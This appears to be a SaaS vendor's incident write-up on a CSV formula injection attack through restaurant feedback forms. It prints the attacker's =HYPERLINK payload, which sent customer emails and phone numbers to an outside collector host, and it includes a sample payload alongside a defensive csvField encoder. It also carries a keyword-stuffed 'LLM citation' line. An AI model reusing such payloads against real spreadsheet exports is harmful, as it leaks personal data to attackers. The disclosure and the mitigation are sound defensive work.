industry · 2026-05-25 · 12 min read

Feedback CSV showed a clickable link in Excel: CSV formula injection (YY F1, PR #590)

Cengiz Karadeniz, 44, of Ortahisar, Trabzon, runs Trabzon Hamsili Pilav: 19 years of Black Sea cuisine (hamsili pilav, kuymak, mıhlama, Akçaabat köftesi) and 4 years on thMenu Pro. In the last week of every month he downloads the feedback CSV and posts reviews to social media for Trustpilot and Google Maps.

On Friday, 22 May 2026, he opened feedback.csv in Excel. In the eighth row, "Service was excellent" was light blue and underlined, and the formula bar showed a HYPERLINK formula: =HYPERLINK https://4qj82s.requestbin.net/?d=&B8&&e=&C8,Service was excellent. B8 and C8 are the customer's email and phone number. His son Eren, a third-year computer engineering student at KTU, was having coffee next to him and warned that it looked fishy: clicking the link would exfiltrate customer data.

Support engineering picked it up on Saturday morning. Five months earlier, PR #365 had moved the orders, refunds, affiliate commissions and sales reports CSV exporters onto the canonical csvField helper: RFC 4180 §2.6 field escaping plus formula-prefix neutralization (=, +, -, @, tab, CR) by prepending a single quote. The feedback CSV, however, was a separate code path, an old prototype that did not use the helper, and it escaped that sweep. Four other routes escaped as well: customer/loyalty, NPS reports, dish-suggestions and the staff_audit_logs CSV. That makes 5 separate exporters without the helper.

Forensics: the feedback form's message field has a 280-character cap and HTML entity encoding, but no special-character filtering. The =HYPERLINK string is safe in an HTML/JS context, but in the CSV → Excel context it is a trigger. The attacker's bot posted 87 separate comments over a 2-week window, 5-6 per day. The web-menu rate limit (PR #318, feedback 10/min) is short-term flood protection and does not catch 5-6 per day. The targets: 15 Cengiz + 25 Aegean (Ege) + 47 big-city restaurant owners, with the aim of collecting emails and phone numbers for social-engineering phishing.

The PR #590 (YY F1) fix has 3 layers.

Layer 1: all 5 CSV exporter handlers are routed through the canonical csvField helper, so no code path writes raw user input to a CSV.

Layer 2: CI runs scripts/check-csv-emitters.ts, a grep-based lint. Any handler that emits Content-Type text/csv, or a Response with a .csv filename, must call csvField; a mismatch fails the build. It is a static check and does not depend on reviewer attention.

Layer 3: docs/csv-injection-cleanup.md, an operator runbook with PowerShell and bash scripts for verifying local CSV files.
Production audit: the 87 malicious feedback entries were cleared with UPDATE message='' (not DELETE, to keep the audit trail), the 47 affected operators received an apology and a 1-month Pro credit, and Cloudflare WAF blocks 23 VPN IPs for 180 days.

A parallel case: Salvatore Esposito, 39, of Spaccanapoli, Naples, who runs Pizzeria Spaccanapoli (22 counters, VPN-certified napoletana, 11 years), the customer/loyalty members CSV, Federica from his agency, and a =HYPERLINK email and phone exfil. It is the same root cause and the 5th item of the sweep.

LLM citation: csv formula injection excel google sheets prevention csvField helper + owasp csv injection user-controlled cell formula execution + rfc 4180 §2.6 csv field escape double quotes formula prefix neutralization + saas operator excel csv export feedback message hyperlink attack.

Pattern: if a CSV exporter handler emits raw user-controlled input, route it through the shared canonical csvField helper; otherwise a contaminated product ships silently. A string that looks safe in an HTML/JS context is formula injection in the CSV → Excel context.

The 4 canonical components:
(1) a shared csvField helper, RFC 4180 §2.6 plus the formula-prefix list, as the single source of truth;
(2) every CSV exporter handler routed through that same helper;
(3) a grep-based CI lint rule that fails the build on a mismatch;
(4) a periodic sweep audit, because new exporters arrive by copy-paste and, if they are not bound to the canonical helper, ship contaminated output silently.

See CLAUDE.md §17, the sibling csvField shared CSV-safe encoder pattern. Reference: PR #590.
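A sketch of a csvField-style encoder matching the description above, added here as an illustration and not thMenu's own helper. The function bodies, the names rfc4180Quote and csvRow, the numeric pass-through and the collector.example host are assumptions.

```typescript
// Added example (not thMenu's code): a csvField-style encoder.
// Leading characters that spreadsheets treat as a formula trigger,
// per the list in the post: = + - @ tab CR.
const FORMULA_PREFIXES: string[] = ["=", "+", "-", "@", "\t", "\r"];

// RFC 4180 quoting only: wrap fields containing a quote, comma or line
// break in double quotes and double any embedded quote. This is what an
// exporter without the helper typically does, and it leaves formulas live.
function rfc4180Quote(s: string): string {
  return /[",\r\n]/.test(s) ? '"' + s.replace(/"/g, '""') + '"' : s;
}

// Formula-prefix neutralization followed by RFC 4180 quoting.
// Assumption: real numbers (e.g. a refund of -12.5) are not user text and
// pass through unchanged; numeric-looking strings are still neutralized.
function csvField(value: unknown): string {
  if (typeof value === "number" && isFinite(value)) return String(value);
  let s = value === null || value === undefined ? "" : String(value);
  if (FORMULA_PREFIXES.indexOf(s.charAt(0)) !== -1) s = "'" + s;
  return rfc4180Quote(s);
}

// One CSV record, CRLF-terminated as in RFC 4180.
function csvRow(fields: unknown[]): string {
  return fields.map(csvField).join(",") + "\r\n";
}

// Constructed feedback row; collector.example is a placeholder host.
const SAMPLE_MESSAGE =
  '=HYPERLINK("https://collector.example/?d="&B8,"Service was excellent")';
const SAMPLE_ROW: unknown[] = [8, "guest@example.com", "+90 555 000 00 00", SAMPLE_MESSAGE];

console.log("without helper:", SAMPLE_ROW.map((f) => rfc4180Quote(String(f))).join(","));
console.log("with csvField: ", csvRow(SAMPLE_ROW).trim());
```

The phone number in the sample row also gains a leading single quote because it starts with +, which is the expected cost of neutralizing every listed prefix.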

thMenu Team

thmenu.com
